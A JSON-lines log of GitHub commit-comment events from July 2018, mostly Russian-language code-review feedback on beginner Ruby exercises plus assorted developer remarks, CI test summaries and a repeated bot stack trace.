{"id":"7985701648","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756399,"position":34,"line":1,"path":"Lesson_1/r_triangle.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T21:57:38Z","updated_at":"2018-07-18T21:57:38Z","author_association":"NONE","body":"Новый массив принято задавать так. sides = []. Но на самом деле тут нет смысла делать пустой массив. Можно сначала получить стороны, а потом сразу создать с ними массив."}},"created_at":"2018-07-18T21:57:38Z"}
{"id":"7985702167","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29756400,"position":null,"line":null,"path":null,"commit_id":"b0452bd99fd77ea2f82b8be9fe5a1f70e12acaca","created_at":"2018-07-18T21:57:45Z","updated_at":"2018-07-18T21:57:45Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-MacOS-10.9-clang: OK (2939 of 2942 tests passed, 13 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 4 tests had: MTR small diffs.\n * 5 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b0452bd99fd77ea2f82b8be9fe5a1f70e12acaca-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b0452bd99fd77ea2f82b8be9fe5a1f70e12acaca-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T21:57:45Z"}
{"id":"7985703225","type":"CommitCommentEvent","actor":{"login":"hoshsadiq"},"repo":{"name":"hoshsadiq/adblock-nocoin-list"},"payload":{"comment":{"id":29756402,"position":6,"line":260,"path":"nocoin.txt","commit_id":"d4d06d301eac48ab13bce744b59819b3907dd4ee","created_at":"2018-07-18T21:58:00Z","updated_at":"2018-07-18T21:58:00Z","author_association":"OWNER","body":"I thought important gave it priority. Anyway it's not necessary anymore as AdGuard team fixed it. I will remove it."}},"created_at":"2018-07-18T21:58:00Z"}
{"id":"7985704115","type":"CommitCommentEvent","actor":{"login":"arturojain"},"repo":{"name":"ivmartel/dwv"},"payload":{"comment":{"id":29756404,"position":null,"line":null,"path":null,"commit_id":"fbe67cae133afbfffb2741c2a7c3be68c23e3882","created_at":"2018-07-18T21:58:12Z","updated_at":"2018-07-18T21:58:12Z","author_association":"NONE","body":"this commit was never merged with the master branch?"}},"created_at":"2018-07-18T21:58:12Z"}
{"id":"7985714175","type":"CommitCommentEvent","actor":{"login":"senior7515"},"repo":{"name":"KowalczykBartek/smf-java"},"payload":{"comment":{"id":29756428,"position":23,"line":56,"path":"src/main/java/smf/client/core/RpcRequestEncoder.java","commit_id":"34e4fc679860b5b5c1a25ef2d35537603ad4c566","created_at":"2018-07-18T22:00:38Z","updated_at":"2018-07-18T22:00:38Z","author_association":"NONE","body":"haha, delete the fix me and add a proper comment like. \r\nheader is a little endian aligned buffer of exactly 16 bytes by the spec. "}},"created_at":"2018-07-18T22:00:38Z"}
{"id":"7985714610","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29756431,"position":null,"line":null,"path":null,"commit_id":"29fa9654ee5c4112ae88030927eb32927bd1cd9c","created_at":"2018-07-18T22:00:44Z","updated_at":"2018-07-18T22:00:44Z","author_association":"NONE","body":"I think you can just simplify away the entire OCB code LUL"}},"created_at":"2018-07-18T22:00:44Z"}
{"id":"7985714705","type":"CommitCommentEvent","actor":{"login":"senior7515"},"repo":{"name":"KowalczykBartek/smf-java"},"payload":{"comment":{"id":29756433,"position":23,"line":56,"path":"src/main/java/smf/client/core/RpcRequestEncoder.java","commit_id":"34e4fc679860b5b5c1a25ef2d35537603ad4c566","created_at":"2018-07-18T22:00:45Z","updated_at":"2018-07-18T22:00:45Z","author_association":"NONE","body":"i like the wizard tho. \r\n"}},"created_at":"2018-07-18T22:00:45Z"}
{"id":"7985716352","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756436,"position":49,"line":16,"path":"Lesson_1/r_triangle.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:01:08Z","updated_at":"2018-07-18T22:01:08Z","author_association":"NONE","body":"Обрати внимание, что ты используешь переменные не отсортированные из массива, а те переменные, которые пользователь ввел выше. Получить эллементы массива можно так\r\n```\r\n# первы элемент в массиве\r\nsides[0]\r\n# третий элемент массива\r\nsides[2]\r\n```"}},"created_at":"2018-07-18T22:01:08Z"}
{"id":"7985717928","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756440,"position":6,"line":6,"path":"task2.1.rb","commit_id":"088554689226a0c87f15a326f7d47938edc1c966","created_at":"2018-07-18T22:01:29Z","updated_at":"2018-07-18T22:01:29Z","author_association":"NONE","body":"при получении height надо сразу преобразовать строку в число, чтобы в переменной height было всегда число"}},"created_at":"2018-07-18T22:01:29Z"}
{"id":"7985719683","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756443,"position":7,"line":7,"path":"task2.1.rb","commit_id":"088554689226a0c87f15a326f7d47938edc1c966","created_at":"2018-07-18T22:01:56Z","updated_at":"2018-07-18T22:01:56Z","author_association":"NONE","body":"ideal_weight тоже надо оставить числом, просто как height - 110"}},"created_at":"2018-07-18T22:01:56Z"}
{"id":"7985721269","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756448,"position":9,"line":9,"path":"task2.1.rb","commit_id":"088554689226a0c87f15a326f7d47938edc1c966","created_at":"2018-07-18T22:02:20Z","updated_at":"2018-07-18T22:02:20Z","author_association":"NONE","body":"сюда вместо height.to_i - 110 надо просто подставить ideal_weight"}},"created_at":"2018-07-18T22:02:20Z"}
{"id":"7985721991","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756452,"position":11,"line":11,"path":"task2.1.rb","commit_id":"088554689226a0c87f15a326f7d47938edc1c966","created_at":"2018-07-18T22:02:31Z","updated_at":"2018-07-18T22:02:31Z","author_association":"NONE","body":"не забываем про отступы в 2 пробела!"}},"created_at":"2018-07-18T22:02:31Z"}
{"id":"7985722416","type":"CommitCommentEvent","actor":{"login":"hark130"},"repo":{"name":"psdwizzard/IILC"},"payload":{"comment":{"id":29756456,"position":null,"line":null,"path":null,"commit_id":"f075c30ff1f78678a666479d20186031a6abb7a4","created_at":"2018-07-18T22:02:37Z","updated_at":"2018-07-18T22:02:37Z","author_association":"NONE","body":"Save yourself some copy/paste time by changing:\r\n```filename.endswith(tuple(ext))```\r\nto\r\n```filename.lower().endswith(tuple(ext))```\r\n\r\nThat way you don't need to copy/paste case-sensitive file extensions into the \"ext\" tuple in this commit.  Why?  You're missing \".Jpg\", \".jPg\", etc.  Programs that open .jpg files won't care about the case sensitivity of a jpg file's file extension and neither should your code."}},"created_at":"2018-07-18T22:02:37Z"}
{"id":"7985725083","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree"},"payload":{"comment":{"id":29756469,"position":null,"line":null,"path":null,"commit_id":"3b3fe0d8a5629157eef951d3d9ab47c86229b5a6","created_at":"2018-07-18T22:03:19Z","updated_at":"2018-07-18T22:03:19Z","author_association":"MEMBER","body":"I should maybe get in the habit of doing this myself. :)"}},"created_at":"2018-07-18T22:03:19Z"}
{"id":"7985725822","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756470,"position":5,"line":5,"path":"area.rb","commit_id":"d4bc41a81a4987f5d0d81a845780ebe59d57b42f","created_at":"2018-07-18T22:03:30Z","updated_at":"2018-07-18T22:03:30Z","author_association":"NONE","body":"1) стороны могут быть не целыми, поэтому надо использовать to_f\r\n2) 1.0 / 2 * a * h лучше заменить на 0.5 * a * h (так на одну операцию меньше) "}},"created_at":"2018-07-18T22:03:30Z"}
{"id":"7985728824","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756474,"position":17,"line":17,"path":"discr.rb","commit_id":"d4bc41a81a4987f5d0d81a845780ebe59d57b42f","created_at":"2018-07-18T22:04:18Z","updated_at":"2018-07-18T22:04:18Z","author_association":"NONE","body":"отлично) только корень из дискриминанта надо вычислить 1 раз, сохранить в переменную, и потом два раза использовать, вместо того, чтобы два раза его вычилять"}},"created_at":"2018-07-18T22:04:18Z"}
{"id":"7985730220","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29756477,"position":null,"line":null,"path":null,"commit_id":"d4e1863547b68c9aade60e74b306e5cfbfa3c250","created_at":"2018-07-18T22:04:39Z","updated_at":"2018-07-18T22:04:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Finish last minute styling of app](https://trello.com/c/n6f8cSH8/15-finish-last-minute-styling-of-app)"}},"created_at":"2018-07-18T22:04:39Z"}
{"id":"7985730232","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29756478,"position":null,"line":null,"path":null,"commit_id":"a85395e886b941f5f2251bd408e90fa9ad113d9b","created_at":"2018-07-18T22:04:39Z","updated_at":"2018-07-18T22:04:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Finish last minute styling of app](https://trello.com/c/n6f8cSH8/15-finish-last-minute-styling-of-app)"}},"created_at":"2018-07-18T22:04:39Z"}
{"id":"7985730584","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29756480,"position":null,"line":null,"path":null,"commit_id":"67dd701fd6a8952038aef91537143f9ad933a3c8","created_at":"2018-07-18T22:04:44Z","updated_at":"2018-07-18T22:04:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Finish last minute styling of app](https://trello.com/c/n6f8cSH8/15-finish-last-minute-styling-of-app)"}},"created_at":"2018-07-18T22:04:44Z"}
{"id":"7985731239","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29756484,"position":null,"line":null,"path":null,"commit_id":"dc94abb2fe56f0e9b17982844fd05c5a37f2ddcb","created_at":"2018-07-18T22:04:54Z","updated_at":"2018-07-18T22:04:54Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/dc94abb2fe56f0e9b17982844fd05c5a37f2ddcb/index.html"}},"created_at":"2018-07-18T22:04:54Z"}
{"id":"7985732472","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29756487,"position":null,"line":null,"path":null,"commit_id":"7893f1c9245afc28ff7f3a048501afa1d5b8ca8b","created_at":"2018-07-18T22:05:13Z","updated_at":"2018-07-18T22:05:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-802](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-802).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-802-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-18T22:05:13Z"}
{"id":"7985732517","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29756488,"position":null,"line":null,"path":null,"commit_id":"ba3219bee2ac2ebbfdf9852007a581cca08a34d0","created_at":"2018-07-18T22:05:14Z","updated_at":"2018-07-18T22:05:14Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T22:05:14Z"}
{"id":"7985732571","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756489,"position":63,"line":29,"path":"Lesson_1/r_triangle.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:05:15Z","updated_at":"2018-07-18T22:05:15Z","author_association":"NONE","body":"А вот это условие нужно скомбинировать с проверкой на прямоугольность. Как по условию. Советую вынести вычисление Пифагора в отдельную пременную, которая будет возвращать true/false (как она сейчас и делает) и назвать ее например rectangular. "}},"created_at":"2018-07-18T22:05:15Z"}
{"id":"7985737650","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"jnastya/bases-Ruby"},"payload":{"comment":{"id":29756498,"position":21,"line":21,"path":"triangle.rb","commit_id":"d4bc41a81a4987f5d0d81a845780ebe59d57b42f","created_at":"2018-07-18T22:06:35Z","updated_at":"2018-07-18T22:06:35Z","author_association":"NONE","body":"интересный подход) \r\n\r\nдва вложенных if сложно читать, лучше вычислить 3 переменные\r\nis_triange\r\nis_isosceles (равнобедренный) \r\nis_equilateral (равносторонний)\r\n\r\nи потом уже на основании этих трех переменных выводить сообщения"}},"created_at":"2018-07-18T22:06:35Z"}
{"id":"7985737769","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756499,"position":7,"line":5,"path":"Lesson_1/triangle_area.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:06:36Z","updated_at":"2018-07-18T22:06:36Z","author_association":"NONE","body":"да, только можно не использовать chomp, если дальше to_i. Потому-что to_i и to_f сами убирают символ новой строки"}},"created_at":"2018-07-18T22:06:36Z"}
{"id":"7985737827","type":"CommitCommentEvent","actor":{"login":"vladimirblokhin"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29756500,"position":17,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"67b5f5af8a3a6bd6c007feeec5e959db475d6ddf","created_at":"2018-07-18T22:06:37Z","updated_at":"2018-07-18T22:06:37Z","author_association":"OWNER","body":"Почему это должно сломаться? Выведет отрицательное значение и корни считать не будет. Я просто корень вынес в отдельную переменную, согласно твоему замечанию, логику не трогал."}},"created_at":"2018-07-18T22:06:37Z"}
{"id":"7985737944","type":"CommitCommentEvent","actor":{"login":"ChrisLynchHPE"},"repo":{"name":"HewlettPackard/POSH-HPOneView"},"payload":{"comment":{"id":29756501,"position":null,"line":null,"path":null,"commit_id":"b86da78f3371e56b9a08567da0c980aa0e3ac9dc","created_at":"2018-07-18T22:06:39Z","updated_at":"2018-07-18T22:06:39Z","author_association":"MEMBER","body":"The ZIP is just a collection of the repo contents.  The EXE will be posted later today, as I have finally resolved my AppVeyor lab environment.  If you have PowerShell 5, you really should be using the PowerShell Gallery.  In the future, I will no longer be publishing an installer, as most customers should be at PowerShell 5.0 or newer (not PowerShell Core)."}},"created_at":"2018-07-18T22:06:39Z"}
{"id":"7985739482","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/tokentree"},"payload":{"comment":{"id":29756504,"position":null,"line":null,"path":null,"commit_id":"3b3fe0d8a5629157eef951d3d9ab47c86229b5a6","created_at":"2018-07-18T22:07:04Z","updated_at":"2018-07-18T22:07:04Z","author_association":"MEMBER","body":"that would be nice, I mean it might look a bit excessive and detailed to list every PR, but I think it's convenient to have such a list and to be able to go back to see what changed for each position - or what each position means"}},"created_at":"2018-07-18T22:07:04Z"}
{"id":"7985744805","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29756517,"position":null,"line":null,"path":null,"commit_id":"8cb64b6012477d7ce4e6cb405820e1800c3a5667","created_at":"2018-07-18T22:08:28Z","updated_at":"2018-07-18T22:08:28Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T22:08:28Z"}
{"id":"7985745618","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29756519,"position":26,"line":26,"path":"lesson1/optimal_weight.rb","commit_id":"53df4e000e3331f345f6e574886491558ad711cb","created_at":"2018-07-18T22:08:41Z","updated_at":"2018-07-18T22:08:41Z","author_association":"NONE","body":"отлично) не забываем пустую строку в конце файла"}},"created_at":"2018-07-18T22:08:41Z"}
{"id":"7985747589","type":"CommitCommentEvent","actor":{"login":"voiceinthedark"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29756522,"position":31,"line":102,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"f0f9cd5ee7a8d67bd2e6f7e2539664a95499831b","created_at":"2018-07-18T22:09:14Z","updated_at":"2018-07-18T22:09:14Z","author_association":"NONE","body":"make sure that the null check happens before the boolean check; otherwise the app will crash with null pointer exception."}},"created_at":"2018-07-18T22:09:14Z"}
{"id":"7985748329","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29756524,"position":4,"line":4,"path":"lesson1/dicriminant.rb","commit_id":"2568b46fe6f8583b8ebec6cf785518ad3f45001b","created_at":"2018-07-18T22:09:27Z","updated_at":"2018-07-18T22:09:27Z","author_association":"NONE","body":"да, только можно не использовать chomp, если дальше to_i. Потому-что to_i и to_f сами убирают символ новой строки"}},"created_at":"2018-07-18T22:09:27Z"}
